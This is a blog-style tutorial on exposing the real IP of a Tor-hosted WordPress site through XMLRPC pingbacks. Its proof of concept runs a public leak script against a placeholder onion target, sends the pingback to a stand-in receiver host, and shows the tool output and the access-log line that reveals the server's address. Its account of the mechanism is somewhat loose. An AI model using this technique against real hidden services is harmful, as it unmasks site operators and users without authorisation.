What is Tor

Tor, short for The Onion Router, is a free and open-source software that helps users maintain their online privacy and anonymity. It operates by routing internet traffic through a series of servers that are operated by volunteers around the world. Each of these servers is responsible for encrypting and forwarding the data to the next server in the chain. As a result, it becomes challenging to trace the origin of the data, making it an attractive option for individuals who want to remain anonymous online.

However, this anonymity also attracts illegal activities, such as drug trafficking, money laundering, and illegal pornography. Law enforcement agencies have struggled to track down these illegal activities, as the perpetrators often use Tor to hide their IP addresses.

Exposing Tor Domains and their IP

Despite the anonymity provided by Tor, it is possible to expose the IP address of a Tor domain. This can be done through a variety of methods, including exploiting vulnerabilities in the Tor network, monitoring network traffic, and using social engineering techniques to trick users into revealing their IP address.

One way to expose the IP address of a Tor domain is by exploiting a vulnerability in the WordPress XMLRPC ping function. The XMLRPC ping function is used by WordPress sites to notify search engines and other services about new content on the site. By default, the function sends a ping to the site's URL, but it can also be used to send a ping to any URL, including Tor domains.

By sending a ping to a Tor domain through the XMLRPC ping function, the Tor domain will respond with its IP address, which can then be used to track the location of the server. This technique has been used by law enforcement agencies to track down illegal Tor domains, including drug markets, illegal pornography sites, and other criminal activities.

Proof of concept

Only use this proof of concept for research and educational purposes!
This proof of concept has removed IP addresses and other sensitive information for security reasons.

To get the IP from a Tor domain we are going to use a script made by Joshua van der Poll at joshuavanderpoll/Tor-Wordpress-IP-Leaker. This script will almost do all the work for us by searching the target's website for blog posts and then sending the pingback request using Tor. The only thing left for us is to check our access logs.

After downloading the GitHub repository and following the setup steps from the README.md file, we will execute the script. I'm gonna execute the following command:

$ python3 wp_xmlrpc_leak.py --host="http://wordpress_target.onion/" --pingback="http://leaked_ip_receiver.com"
which results in the following response:
Tor WordPress XMLRPC IP Leaker
[•] Made by: https://github.com/joshuavanderpoll/Tor-Wordpress-IP-Leaker
[@] Trying to get a blog post to use for pingback requests...
[@] Trying HTML body method...
[√] Retrieved post link from HTML.
[√] Using post http://wordpress_target.onion/?p=1...
[√] Sent XMLRPC pingback request to http://leaked_ip_receiver.com/wordpress_target.onion.
[√] Received success response from XMLRPC request.

[√] Check your receiver's host its request/access logs to see the target it's IP.
As you can see from the response I've received a successful response from the XMLRPC request which should mean I have new access logs at my receiver's website. Checking the logs on the receiver website I see logs like:
1.2.3.4 - - [29/Dec/2022:20:15:19 +0000] "GET /wordpress_target.onion HTTP/1.1" 404 5277 "http://leaked_ip_receiver.com/wordpress_target.onion" "WordPress/6.0.1; http://wordpress_target.onion; verifying pingback from 127.0.0.1"
In this log, you can see that the IP 1.2.3.4 has sent us a "verifying pingback" request using "WordPress/6.0.1". We can see the host Tor domain in the
 "GET /wordpress_target.onion HTTP/1.1"
part because the script puts the target domain in the URL of the receiver host. which tells us that "wordpress_target.onion" has the IP address "1.2.3.4".

Summary

While Tor provides a high level of anonymity and privacy, it is not completely foolproof. There are several ways to expose the IP address of a Tor domain, including exploiting vulnerabilities, monitoring network traffic, and using social engineering techniques. The WordPress XMLRPC ping function is one example of how Tor domains can be exposed, and it has been used successfully by law enforcement agencies to track down illegal activities on the dark web. It is essential to understand the risks and limitations of using Tor and to take appropriate measures to protect your online privacy and security.